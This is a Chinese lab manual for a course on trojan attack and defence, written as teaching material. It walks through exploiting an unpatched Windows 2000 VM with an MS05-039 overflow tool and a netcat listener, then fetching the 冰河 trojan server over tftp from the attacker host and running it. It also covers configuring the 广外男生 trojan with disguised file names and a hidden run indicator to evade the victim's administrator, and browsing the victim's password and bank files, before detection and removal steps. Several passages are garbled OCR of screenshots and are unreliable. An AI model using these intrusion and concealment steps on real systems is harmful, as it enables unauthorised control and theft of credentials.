实验指导5：木马攻击与防范实验指导书

实验指导5木马攻击与防X实验1. 实验目的理解和掌握木马传播和运行的机制，掌握检查和删除木马的技巧，学会防御 木马的相关知识，加深对木马的安全防 X 意识。2. 预备知识2.1 木马与木马技术的介绍（1）木马概念介绍 很多人把木马看得很神秘，其实，木马就是在用户不知道的情况下被植入用 户计算机，用来获取用户计算机上敏感信息（如用户口令，个人隐私等）或使攻 击者可以远程控制用户主机的一个客户服务程序。这种客户 /服务模式的原理是 一台主机提供服务（服务器），另一台主机使用服务（客户机）。作为服务器的主 机一般会打开一个默认的端口并进行监听（Listen）,如果有客户机向服务器的这 一端口提出连接请求（Connect Request），服务器上的相应守护进程就会自动运 行，来应答客户机的请求。通常来说，被控制端相当于一台服务器，控制端则相 当于一台客户机，被控制端为控制端提供预定的服务。（ 2）木马的反弹端口技术 由于防火墙对于进入的往往会进行非常严格的过滤，但是对于连出的却疏于 防X。于是，与一般的木马相反，反弹端口型木马的服务端（被控制端）使用主 动端口，客户端 （控制端）使用被动端口。木马定时监测控制端的存在，发现控 制端上线立即弹出端口主动连结控制端打开的主动端口；为了隐蔽起见，控制端 的被动端口一般开在 80，这样，即使用户使用端口扫描软件检查自己的端口， 发现的也是类似 TCP UserIP:1026 ControllerIP:80ESTABLISHED 的情况， 稍微疏忽一点，你就会以为是自己在浏览网页 。（ 3）线程插入技术 木马程序的攻击性有了很大的加强，在进程隐藏方面，做了较大的改动，不 再采用独立的 EXE 可执行文件形式，而是改为内核嵌入方式、远程线程插入技 术、挂接 PSAPI 等。这样木马的攻击性和隐藏性就大大增强了。2.2 木马攻击原理特洛伊木马是一个程序，它驻留在目标计算机里，可以随计算机自动启动并 在某一端口进行侦听，在对接收的数据识别后，对目标计算机执行特定的操作。木马，其实质就是一个通过端口进行通信的网络客户/服务程序。（1）基本概念 网络客户/服务模式的原理是一台主机提供服务（服务器），另一台主机接受 服务（客户机 ）。作为服务器的主机一般会打开一个默认的端口并进行监听 （Listen）， 如果有客户机向服务器的这一端口提出连接请求 （Connect Request）， 服务器上的相应程序就会自动运行，来应答客户机的请求，这个程序称为守护进 程（UNIX的术语，不过已经被移植到了 MS系统上）。对于特洛伊木马，被控制 端就成为一台服务器，控制端则是一台客户机， G_server.exe 是守护进程， G_client 是客户端应用程序。（2）实现木马的控制功能由于Win98开放了所有的权限给用户，因此，以用户权限运行的木马程序几 乎可以控制一切，下面仅对木马的主要功能进行简单的概述， 主要是使用 Windows API 函数。 远程监控（控制对方鼠标、键盘，并监视对方屏幕） keybd_event模拟一个键盘动作。 mouse_event模拟一次鼠标事件 mouse_event（dwFlags， dx， dy， cButtons， dwExtraInfo）dwFlags: MOUSEEVENTF_ABSOLUTE 指定鼠标坐标系统中的一个绝对位 置 MOUSEEVENTF_MOVE 移动鼠标 MOUSEEVENTF_LEFTDOWN 模拟鼠标左键按下 MOUSEEVENTF_LEFTUP 模拟鼠标左键抬起 MOUSEEVENTF_RIGHTDOWN 模拟鼠标右键按下 MOUSEEVENTF_RIGHTUP 模拟鼠标右键按下 dx，dy:MOUSEEVENTF_ABSOLUTE 中的鼠标坐标。 记录各种口令信息keylog begin：将击键记录在一个文本文件里，同时还记录执行输入的窗口 名。 获取系统信息a. 取得计算机名GetComputerNameb. 更改计算机名SetComputerNamec. 当前用户 GetUserNamed. 系统路径e. 取得系统版本f. 当前显示分辨率 限制系统功能a. 远程关机或重启计算机，使用WinAPI中的如下函数可以实现。ExitWindowsEx(UINT uFlags， DWORD dwReserved)当 uFlags=EWX_LOGOFF 中止进程，然后注销=EWX_SHUTDOWN 关掉系统但不关电源=EWX_REBOOT 重新引导系统=EWX_FORCE强迫中止没有响应的进程=EWX_POWERDOWN 关掉系统与关闭电源b. 锁定鼠标，ClipCursor(lpRect As RECT)可以将指针限制到指定区域，或者用ShowCursor(FALSE)把鼠标隐藏起来也可以，RECT是定义的一个矩形。c. 让对方掉线RasHangUpd. 终止进程 ExitProcesse. 关闭窗口利用FindWindow函数找到窗口并利用SendMessage函数关闭窗口 远程文件操作删除文件：File delete拷贝文件： File copy共享文件：Export list (列出当前共享的驱动器、目录、权限与共享密码) 注册表操作在 VB 中只要 Set RegEdit=CreateObject( WScript.Shell)就可以使用以下的注册表功能：删除键值:RegEdit.RegDelete RegKey增加键值:RegEdit.Write RegKey， RegValue获取键值:RegEdit.RegRead (Value)2.3木马的防X建议A. 不要随意打开来历不明的现在许多木马都是通过来传播的，当你收到来历不明的时，请不要打开， 应尽快删除。并加强监控系统，拒收垃圾。B. 不要随意下载来历不明的软件 最好是在一些知名的下载软件，不要下载和运行来历不明的软件。在安装软件的同时最好用杀毒软件查看有没有病毒，之后才进行安装。C. 与时修补漏洞和关闭可疑的端口一般木马都是通过漏洞在系统上打开端口留下后门，以便上传木马文件和执行代码，在把漏洞修补上的同时，需要对端口进行检查，把可疑的端口关闭。D. 尽量少用共享文件夹如果必须使用共享文件夹，则最好设置XX和密码保护。注意千万不要将系 统目录设置成共享，最好将系统下默认共享的目录关闭。Windows系统默认情况 下将目录设置成共享状态，这是非常危险的。E. 运行实时监控程序在上网时最好运行反木马实时监控程序和个人防火墙，并定时对系统进行 病毒检查。F. 经常升级系统和更新病毒库。3. 实验环境1）预备知识要求 了解网络的基本知识；熟练使用windows操作系统；充分理解木马攻击原理；熟悉缓冲溢出攻击。2）下载和运行木马软件期间，请关闭杀毒软件的自动防护功能以与防火墙， 否则程序会被当作病毒而强行终止。3.1 运行环境1）需要下载的其它的工具软件有： tftpd32.exe tftp服务程序，用来传输“冰河”木马服务端程序 ncexe:缓冲溢出攻击反向连接服务程序（参见“缓冲区溢出攻击与防X 实验” ）； Ms05039.exe:缓冲溢出攻击工具（参见“缓冲区溢出攻击与防 X实验” ）；冰河木马.exe:冰河木马程序； gwboy092.exe： “广外男生”木马程序。2）本实验需要用到虚拟机，因此每台实验主机都通过安装软件 WMware Workstation 分割出虚拟机。真实主机P1的配置为：操作系统Windows2000 server或者windows xp sp2,并且安装ms05-039.exe缓冲区溢出攻击软件，“冰河”木马，“广外男生”木马。虚拟机P2配置为:操作系统Windows2000 Server（没有打补丁，存在msO5O39 漏洞，并且安装了 IIS组件）。3）实验环境拓扑如图 1 所示:图 1 实验网络拓扑图请根据实验环境将 IP 地址填入下表，攻防实验服务器IPPl:本机IPP2:本机上的虚拟机IPP3:表 1 实验 IP实验中，可把真实机 P2 作为攻击机，安装上“冰河”木马程序， ms05039.exe， nc.exe， tftpd32.exe 和“广外男生”；虚拟机 P3 作为被攻击主机，安装 IIS 组件。4. 实验内容和步骤4.1 实验任务一：“冰河”木马 本实验需要把真实主机作为攻击机，虚拟机作为靶机。即首先利用 ms05039 溢出工具入侵虚拟机，然后利用“冰河”木马实现对虚拟机的完全控制。最后对 木马进行查杀。A.“冰河”使用：冰河是一个基于 TCP/IP 协议和 Windows 操作系统的网络工具，所以首先应 确保该协议已被安装且网络连接无误，然后配置服务器程序（如果不进行配置则 取默认设置），并在欲监控的计算机上运行服务器端监控程序即可。主要文件包括：a. G_Server.exe:被监控端后台监控程序（运行一次即自动 安装，可任意改名），在安装前可以先通过“G_Client”的配置本地服务器程序 功能进行一些特殊配置，例如是否将动态IP发送到指定信箱、改变监听端口、 设置访问口令等）；b. G_Client.exe:监控端执行程序，用于监控远程计算机和 配置服务器程序。具体功能操作包括：a. 添加主机：将被监控IP地址添加至主机列表，同时设置好访问口令与端 口，设置将保存在Operate.ini文件中，以后不必重输。如果需要修改设置，可 以重新添加该主机，或在主界面工具栏内重新输入访问口令与端口并保存设置。b. 删除主机：将被监控端IP地址从主机列表中删除。c. 自动搜索：搜索指定子网内安装有冰河的计算机。d. 查看屏幕：查看被监控端屏幕。e. 屏幕控制：远程模拟鼠标与键盘输入。f. “冰河”信使：点对点聊天室。g. 修改远程配置：在线修改访问口令，监听端口等服务器程序设置，不需 要重新上传整个文件，修改后立即生效。B.在对“冰河”有所了解之后，我们进入攻防实验阶段一一使用“冰河”对 目标计算机进行控制：在目标主机（虚拟机）上植入木马，即在此主机上运行 G_Sever，作为服务器端；在攻击机上运行G_Client,作为控制端。分别运行这 两个.exe文件后，我们进入控制端主界面，按照以下步骤来实现对目标主机的 控制。步骤1：入侵准备工作1）下载和安装木马软件前，关闭杀毒软件的自动防护功能，避免程序会被 当作病毒而强行终止。2）运行 G_CLIENT.EXE，如图 2；图 2“冰河”运行主界面3）选择菜单“设置”-“配置服务程序”，如图3图 3 设置木马服务4）设置访问口令为“1234567”，其它为默认值，点击 “确定”生成木马 的服务端程序 G_SERVER.EXE。5）将生成的木马服务程序G_SERVER.EXE拷贝到tftp服务的目录即C:攻 防tftp32,如图 4。4后退”勺|盘搜索|昌文件夹 3 |梧聒 X 覘|囲+ 地址側 |1 C:Wtftp32文件夹矽桌面-H我的电脑+35软盘(A:)|白曰本地磁盘(U)Docurnents and SettirFOUND .000Prugram Files tmpWINNT 玫防tftp32选定项目可以查看苴说明另谙参阅：我的文挡网上邻居我的电脑G_5erver. exe tftpd32. exetftp32_J冰河+本地磁盘（D:）图4将G_SERVER.EXE拷贝到目录C:攻防tftp326）运行tftpd32.exe,如图5。保持此程序一直开启，用于等待攻击成功后传输木马服务程序。图5 tftp服务运行步骤2：进行攻击，将木马放置在被攻击端1）对靶机P3进行攻击，首先运行nc -vv -l p 99接着再开一个dos窗口，运行ms05039 192.168.20.23 192.168.20.1 99 1（注意：此次IP地址请根据实际IP地址修改）2）攻击成功后，在运行nc vv l p 99的dos窗口中出现如图6提示, 若攻击不成功请参照“缓冲区溢出攻击与防X实验”再次进行攻击。图6攻击成功示意3）在此窗口中运行tftp i 192.168.20.1 get gserver.exe将木马服务程序G_server.exe上传到靶机P3上，并直接输入g_server.exe 使之运行，如图7。C = Xtfl NNT Ssystem32 G_Seryer. exe G-Kbpuibf _exeC s MJNNT B3rstcm32 tf ip -i 192.1&8.3.1G3 G_Sei-er. xeC:xgongfan?nc -uu -1 -p 9?Listeningr on 99 B Bconnect from COMMONOB-766GJ0 192 =tG!8 31日0 1935 Mici*osuf t Vindows 2000 Uei*siDn 5G0-2155 CO 版权所有 1SS5-20HI0 llliciosaft: Corp.C ； W1 NNT Ssvstem32 tf tp 一 i 12.168jgret G-Seivci. exetftp -1 192.168.3-163 get GJSeFuer.exeIr-anisfbf succeEsFnl= 2663S& bytes in 1 econcl 26&386 bytes/gllstenlpg on Eany JI 9?.,.connect Fom C0Mrt0NDR-766C?U L192 H16S ,3H1501 1032 iicrcsoft Vindcws 2B00 EUersion CO 戍粒PF1有 1985-2000 MiurusufL Cury.图7上载木马程序并运行步骤 3：运行木马客户程序控制远程主机1）打开程序端程序，单击快捷工具栏中的“添加主机”按扭，如图8所示。 “显示名称”填入显示在主界面的名称“target” “主机地址”：填入服务器端主机的 IP 地址“192.168.20.23”。 “访问口令”：填入每次访问主机的密码，这里输入“1234567”。 “监听端口”：“冰河”默认的监听端口是 7626，控制端可以修改它 以绕过防火墙。target主机地址；12. 16B. 3, 150访问口令:*水林*|监听喘口 :图 8 添加主机单击“确定”按扭，即可以看到主机面上添加了主机，如图 16。立件正TH :F咼且三IWRjEF二I端口：両Illi文出5称文件大小仔节）I昂后更新时何and :iviirtnFals-團我的电脑3 tarEct 曰U C：庠匚J acwTiAnt! F- (J Inetpub 1+ I | PrcErain B 匚| ELECYCLER /iplzfo fl MJTDOWS_J共石比-i-灼录巫用S力呵31鸟：”杓卄艸二肃淳榕：Lzu=L口文*岂址器 电命除件常I舍出 FLfLrLsurLvLtp +- ddllululszulJ Tllonclmcxltnz a c c c c D L D F H 1 1 I 口 口二17m二1甲F-曰 11:1;F11:J-:刊图 9 添加主机后主界面这时我们就可以像操作自己的电脑一样操作远程目标电脑，比如打开C:WINNTsystem32config 目录可以找到对方主机上保存用户口令的 SAM 文件。 点击鼠标右键，可以发现有上传和下载功能。即可以随意将虚拟机器上的 XX 文 件下载到本机上，也可以把恶意文件上传到该虚拟机上并运行。可见，其破坏性 是巨大的。2)“文件管理器”使用。点击各个驱动器或者文件夹前面的展开符号，可 以浏览目标主机内容。如图 17 所示，通过浏览可以发现目标主机的敏感信息， 如“银行账号”等。二口2文件T迟直匹Rjh口方件芦Tf舟 屯 命労控制台二二窗會舷価価協會會協舷倔窗區&回E1-E-.IH-.E1-:E由.田：冋Fl-.E-la-El-QsFlH丈件名称文件大小辱书)最后更新时间urtT.际662006-&-23 12:03:56M|萍行t K t41-2CO6-6-23 12:05:10讣叵匚令：Ji用比银行账号acn击0 okcad.AE h.fl.ckcarnum asitiyzrLRECYCLER 符阅 i汐E期冇馬 就定乎.统- 端口：汕空社八E哀/图9浏览至敏感信息然后选中文件，在右键菜单中选中“下载文件至 .”，在弹出的对话框中 选好本地存储路径，点击“保存”。下载成功是界面如图 10。工行txt药秋b俘节)匸最后更新时同S& 200B-6-23 L2：03：5S402006-6-23 12：US：0黠11禺二前i工捋:茄匚:g立A呂貓:*:鲁 -il-,a-s-E-iJ-a-s-El-i-i-,a-El-Li-曰_l-楚行.ttI，ngJlECCLERicrTib okz de sh耳匸k*iwuiTi A.shiyaxi|文件fg送盗毕图10成功下载文件后界面2)“命令控制台”使用。单击“命令控制台”的标签，弹出命令控制台界面，如图 11，验证控制的各种命令。图 11 命令控制台a. 口令类命令：展开“口令类命令”，如图 12C3丈叶呀沖样耍nr画虜11谊接：7花访问口令：1罕耳帛冲茅林应 ffl S侖辛控制甘-咏匚2半弟鸟a耒纭信启母口孚Q血会a石雑订录-辻存制半仆每 可0网箔类酣令-工立件芋c令+工汁冊衣烽m+红许诗荽力ll-/.亠V: 录录贰刁尸：一,疗存KK 幽IW宀目口机.-zi2 Group Polts1H323T5P rraler Internet Settings ntFlun回匚由6MEIONrods-l.udxl类型Manar-22hS.MylMS3TRAY2Si5KVTJErPersonal.Ey 3zornrcodK_Hetcr 囱 sixerRabbi:氷口 画5/rrfi忙ciEatm . 凹也myREG_SREG_SREG_52REG_52REG_2REG_2REG_S2REG_ZREG_Z PEG_ PEG_ REG_SC :VZINNT,|5y5tem32Vemel32i pxe C;PrDg-i3m FilwGarrmon Fiesyrnsnlet 5harC :Prograrn FihsCNhJlCCdncdnLp. exe;D:Progrflm FiesD-7aDkcemon.cE Hang L nianagei-32h exeDzfrcqrm Fife5MyMVMyJM.eeS3trsyZ.eiceD ：Ffl.OTRA L l5WMETlIFREVALLpfn deprogram RltRinac 5Ujdti3：Dnn CadeciSixirr .：D： 1PROG口A1 归PERR1 训AGKE1灼RP日比E EDbsyri 匚，削 b /loaonC;FROGRA L ISVMAMT-lWPTray争日Relablltr :uJ CptionaJCompar _ IntlRur! CC 由4二I IPCanfMSF1二| IPConFTSP _ MB ijh二J ModiJeUfc弐eM5-DQ5 EnuJatianNetCacte我的 teJteiHREY_LOCAL_MAa-nNE,iSOFTXVAREMli：ro5oftWridopsCurrenWerloriRijn图 16 注册表编辑-in 2d注册岚Q躺哺E）冥加收除巳稻肋（Hl土名称E-KtShelMens5tillrriag? Syncmar曲1-;厂曲.爭1.:爲爭1.-;由，爭1.:爭|1:广，51-:厂1.:卜，51-二；1-51-0.-1.3-31-.nstaler nternet Sektngs ntlPJUn ntlRjun.OC PLcciFMSP PCcnFTSPMCD Moduleuscp M54ZC6 Ernulabnn NetCcheNh prices Relk=bifiNRjuniervtesSetup 5harrdDLL5 5hell Etcnsans ShdlCorrpaUbllW美型REG_5ZREG_5E口 *|WIMNTi1Vt9ri32V5服务端运行时显示运行标识并允许对方過出厂常规设置E1CE文件名DLL文件茗剁b&ydlL dll注冊表项目广外男生启动项奋tag COIiOL3? MOGW图 23 服务器端设置在“EXE文件名”和“DLL文件名”中填入加载到远程主机系统目录下的 可执行文件和动态库文件，在“注册表项目”中填入加载到远程主机注册表中的 Run目录下的键值名。这些文件名都是相当重要的，因为这是迷惑远程主机管理 员的关键所在，如果文件名起的非常隐蔽，如sysremote.exe，sysremote.dll，那 么就算管理员发现了这些文件也不肯定这些文件就是木马而轻易删除。注意：把 “服务器端运行时显示运行标志并允许对方退出”前面的对勾去掉，否则服务器 端主机的管理员就可以轻易发现自己被控制了。(5) 进行网络设置，如图24选择“静态IP”，在“客户端IP地址”中填入 入侵者的静态IP地址(即真实机IP), “客户端用端口”填入在客户端设置中选 则的连接端口。图 24 网络设置(6) 生成代理文件，在“目标文件”中填入所生成服务器端程序的存放位 置，如E:gwboy092Ahacktest.exe,这个文件就是需要植入远程主机的木马文件。 单击“完成”即可完成服务器端程序的设置，这时就生成了一个文件名为 hacktest.exe的可执行文件，如图25，并将该文件拷贝到虚拟机桌面上图 25 生成代理文件（7）进行客户端与服务器连接。在虚拟机上执行木马程序hacktest.exe，等 待一段时间后客户端主机“广外男生”显示连接成功， 如图 26。这时，就可以 和使用第2 代木马“冰河”一样控制远程主机，主要的控制选项有“文件共享”， “远程注册表”，“进程与服务”，“远程桌面”等。图 26 客户端与服务器连接成功2）命令行下“广外男生”的检测（1）由于使用了“线程插入技术”，所以在 windows 系统中采用任务管理器查看线程是发现不了木马的踪迹的，只能看到一些正常的线程在运行，所以需 要用到另外两个工具：fport和tlist。fport是第三方提供的一个工具，可以查看 某个具体的端口被哪个进程所占用，并能查看PID。tlist是windows资源工具箱 中提供的工具，功能非常强大，我们利用它查看进程中有哪些动态库正在运行， 这对于检测插入在某个正常进程中的线程是非常有用的。【问题 2】：什么是“线程插入技术”？（2）在服务器端主机（虚拟机）上依次单击“开始”一“运行”输入cmd, 进入命令行提示符，在这里输入netstat -an，查看网络端口占用状态，如图27。 在显示结果中，发现可疑IP地址（就是客户端IP地址）与本机建立了连接，这 是我们需要注意的地方，记住本机用于连接的端口号1231， 1232， 1233， 1234。F： XiicLsL*R i gn 口ririvRSKW.M.W.W：MW.M.W.WiM0.0.0.0:00.0.0:00.0.0.0:00.0.0.0:00.0.0.0:0192.1G8.3.1G3：342JilZAlZft LISTENINGLI S I HNI N（； LI K I KNI N（； LISTENING LISTENING LISTENING LISTENING LISTENING ESTADLISIIEDTCP TCP TCPTCP192.16192.16192.16192.16192.16192.16192.16192.16ESTADLIS ESTADLIS ESTADLIS ESTABLISUDP UDP UDPIIDF IIDFUDP0.0.0.0=丄350.0.0.0:4450.0.0.：1026192.168,3.150=137192.168,3.150:138192_16S_2_150：50Sml图27命令行下键入ne tstat -an命令（3）接着在提示符下输入 fport （注意，要在有 fport.exe 的目录中运行 fport）， 在显示结果中找到以上端口号，发现木马插入的进程是Explorer.EXE,记住此进 程的PID号728，如图28。F：气fportFPni*t u2 - 0 TCPZIP Pr-acess to Part riappev* Copyv ijflit 2 000 by Foundstonc , I nc . littp：/www- founds tone .comd 8 2i 0 3PI4KI GOU：Process sucliost gys te n Systc n NSTaskProtorat liC= XWINNTsj/stem2suchost -exeG： VJIblNTXsfstEiiSZxriSTasIc.Exe-1Q80- 081- 1082一1083TCPTCPTCPTCPf，hexploi*ei = exe r Sexpluid.exe rexDlorer.exe f Sc xp lo i*c i* . c xcexplo i*ei explu Ier* explorer cxplo i*ei*7WU7807W7WUG： XWINNTXsystem32suchost - exeC SWI NHT s ys t c n3 2 Sis ass - c xeC 二 WI NNT sj/stieni32 sev _1匸芒吞.exe图28命令行下键入fport命令（4）在提示符下输入 tlist 728，查看在 Explorer.EXE 中进行的动态库，如 图29。在显示结果中发现木马的dll文件gwboydll.dl 1,在实际中此名称会更为 隐蔽，需要仔细检查，还可以找一台正常主机进行对比检查。图29在命令行下键入tlist命令（5）在命令行提示符下输入 tlist -m gwboydll.dll 查看木马是否还插入其他的进程。在显示结果中发现木马插入了两个进程，Exp1orer.EXE, ctfmon.exe,如图 30。这是木马的高级之处,如果一个进程被杀,另一个进程还会运行并且立即再在其他进程中插入木马文件。图30在命令行下键入tlist -m命令3）手动删除“广外男生”木马 “广外男生”木马除了可以采用防病毒软件查杀之外，还可以通过手动方法 删除，具体手动删除步骤如下：（1）依次单击“开始”“运行”，输入 regedit 进入注册表，依次展开到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun,在里面找到木马自启动文件进行删除，如图31。图 31 注册表中“广外男生”的位置（2）进入C:WINNTSystem32，按文件大小进行排序，寻找116kb的文件，如图 32。在这些文件中找到修改时间离现在比较近的，一般就是最近所添加的文件，将 gwboy.exe 文件删除。图 32 注册表中 gwboy.exe 文件（3）在注册表中依次单击“编辑”“查找”，查找文件名为 gwboydll.dll的文件，找到后将相关注册表项全部删除，如图 33，注田表 輪揖回査至蛍4WE?帘购比；Inrror5erwt3?名做裘型凹:趺闪I- _-_Jj1lbl-CI-.jVr.dr-l|.gnboydll dll Apartrrnt査黑电 i!wlHYJOLAL_MiiCHNEI15eF7VAREaa55e5CL5ID-（ua=265Fa-aFa2-tlD2-E2-fl000aaLILClCl50UnFracServ-32EF由由由申甲审由由田由EE田由由由.田由由0b3Ei79F6-7539-l LD2-1 * 61051E+-E0O1 IDO 0&5C6F-D9ClllDl-(口斗日Z3-L L dZ- !：06B (0&CE0C3-&517-llDj- u.DD3eD3-Diaii F 巴兰巴土乂陆1白 SXSSSSSS (0713EaAZ 850A-L01E- 071ZEjaA6-e50A-101E 7LBE 日匚*图 33 注册表中 gwboydll.dll 文件（4 ）重新启 动主机， 按 F8 进入带 命 令提示的安全 模式，再进 入C:WINNTSystem32中，输入del gwboydll.dll删除木马的动态库文件，这样就彻 底把木马文件删除了。5. 实验报告要求写出实验完成过程，查找资料，回答实验任务的相关问题。6. 分析与思考安装或启动一款杀毒软件，对中了木马的主机进行全面扫描，查看在哪些目 录下存在木马文件，木马文件都是什么，加深对木马文件驻留主机位置和原理的 认识。